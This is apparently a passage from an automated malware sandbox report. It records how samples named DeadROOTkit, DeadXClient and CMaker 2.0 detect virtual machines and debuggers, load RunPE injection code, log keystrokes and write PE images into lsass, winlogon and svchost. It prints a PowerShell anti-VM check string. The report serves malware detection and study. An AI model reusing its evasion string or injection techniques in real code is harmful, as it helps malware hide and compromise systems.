                        Source: svchost.exe, 0000001E.00000000.2403486929.0000022E67080000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

                        Anti Debugging

                        barindex
                        Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                        Source: C:\Users\Public\DeadROOTkit.exeCode function: 7_2_00007FFD344F78C1 CheckRemoteDebuggerPresent,7_2_00007FFD344F78C1
                        Source: C:\Users\Public\DeadROOTkit.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABFA1D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF6FABFA1D8
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD8F787B30 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,5_2_00007FFD8F787B30
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FAC03280 GetProcessHeap,2_2_00007FF6FAC03280
                        Source: C:\Users\Public\DeadXClient.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\Public\Deadsvchost.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\aoKTzGQSRP.exeCode function: 0_2_00401481 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,0_2_00401481
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABEAD00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF6FABEAD00
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABFA1D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF6FABFA1D8
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABEB740 SetUnhandledExceptionFilter,2_2_00007FF6FABEB740
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FABEB59C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF6FABEB59C
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABEAD00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF6FABEAD00
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABFA1D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF6FABFA1D8
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABEB740 SetUnhandledExceptionFilter,5_2_00007FF6FABEB740
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FF6FABEB59C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF6FABEB59C
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD93483058 IsProcessorFeaturePresent,00007FFDA43319C0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFDA43319C0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD93483058
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9361DA5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD9361DA5C
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A1CBC SetUnhandledExceptionFilter,5_2_00007FFD935A1CBC
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD935A2135 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD935A2135
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9DFA3C00 IsProcessorFeaturePresent,00007FFDA43319C0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFDA43319C0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD9DFA3C00
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9DFD3438 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD9DFD3438
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9F3B2FF8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD9F3B2FF8
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 5_2_00007FFD9F3BD070 SetUnhandledExceptionFilter,5_2_00007FFD9F3BD070
                        Source: C:\Users\Public\DeadXClient.exeCode function: 6_2_1C598518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_1C598518
                        Source: C:\Users\Public\DeadXClient.exeCode function: 6_2_1C5981B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_1C5981B0
                        Source: C:\Users\Public\DeadXClient.exeCode function: 6_2_1C59B62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_1C59B62C
                        Source: C:\Users\user\AppData\Local\Temp\1.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Yara detected Powershell download and execute
                        Source: Yara matchFile source: Process Memory Space: CMaker 2.0.exe PID: 1136, type: MEMORYSTR
                        .NET source code contains process injector
                        Source: 4.2.1.exe.13091a30.4.raw.unpack, RunPE.cs.Net Code: Run contains injection code
                        Source: 8.2.DeadCodeRootKit.exe.1540b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
                        Source: 8.0.DeadCodeRootKit.exe.1540b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
                        Source: 9.2.powershell.exe.1de7ce30000.16.raw.unpack, RunPE.cs.Net Code: Run contains injection code
                        .NET source code references suspicious native API functions
                        Source: DeadXClient.exe.4.dr, Messages.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
                        Source: DeadROOTkit.exe.4.dr, XLogger.csReference to suspicious API methods: MapVirtualKey(vkCode, 0u)
                        Source: 4.2.1.exe.13091a30.4.raw.unpack, Unhook.csReference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
                        Source: 4.2.1.exe.13091a30.4.raw.unpack, RunPE.csReference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
                        Source: 4.2.1.exe.13091a30.4.raw.unpack, RunPE.csReference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
                        Source: 4.2.1.exe.13091a30.4.raw.unpack, RunPE.csReference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
                        Source: 4.2.1.exe.13091a30.4.raw.unpack, RunPE.csReference to suspicious API methods: NtSetContextThread(thread, intPtr5)
                        Creates a thread in another existing process (thread injection)
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: 16582AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: F14E2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 41FA2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: 5B082AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F32B2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 9FD62AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: CA6E2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: ED7B2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A1982AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 95FB2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 670C2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4A4B2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 19A42AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D1FC2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: BDC92AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D8FC2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D2C72AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: CE6B2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: AEFD2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: B6942AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A22A2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 25AA2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1A2F2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 63952AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4ABA2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F03D2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AF3C2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EBEB2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8E1B2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A7DC2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12A2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0F52AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D7C2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 68FC2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EA5D2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CE9B2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D5BB2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DEB72AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0462AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A2152AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8EB2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 60742AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 569B2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8FE62AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3DC22AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 99B22AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 984F2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 81BB2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D2D92AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DE442AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1D0E2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8662AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D1E52AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D2002AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 155B2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43E52AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6F82AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 68252AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 452E2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27D22AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E5C02AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B07C2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4F662AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AE502AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1B9F2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3CD2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF7C2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43652AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E1052AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 37B21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9ABF2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D4DC2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7EC92AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DA21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15D21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13721CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E521CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7A21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BF21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13F21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2CF21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14C21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F421CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11E21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A121CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25821CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DD21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D621CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C221CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11921CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BF21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CA21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C321CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22B21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E721CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BF21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BF21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B921CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11021CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9821CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9021CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11421CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10221CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D721CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5921CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8121CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E721CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7721CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DA21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B821CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25C21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12621CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CE21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E721CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6121CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8421CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12221CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D721CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9121CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7A21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A121CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13B21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D821CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C321CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9C21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10021CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30421CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BA21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F021CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CA21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13D21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B921CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12221CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C221CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D321CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7621CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D721CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6721CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12A21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13E21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13D21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DA21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3921CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4321CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22421CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 31221CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F021CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FA21CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A621CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14721CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D021CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D721CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8121CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F021CF
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1C562AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CDA02AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\wbem\WMIADAP.exe EIP: 9A4B2AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 56262AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 87A32AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1122AB8
                        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11C2AB8
                        Injects a PE file into a foreign processes
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016580000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E41FA0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15B080000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF32B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23C9FD60000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 246ED7B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 200A1980000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22595FB0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22E670C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24C19A40000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275D1FC0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23BBDC90000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 227D8FC0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2DED2C70000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14ACE6B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 220AEFD0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241B6940000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 202A22A0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D25AA0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BD1A2F0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A63950000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1834ABA0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D8F03D0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18BAF3C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 256EBEB0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2568E1B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 226A7DC0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 12A0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2C0F50000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2EE0D7C0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22B68FC0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA5D0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE9B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 11CD5BB0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207C0460000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 245A2150000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24708EB0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F60740000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26E569B0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1D63DC20000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A799B20000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F6984F0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26481BB0000 value starts with: 4D5A
                        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 166D2D90000 value starts with: 4D5A
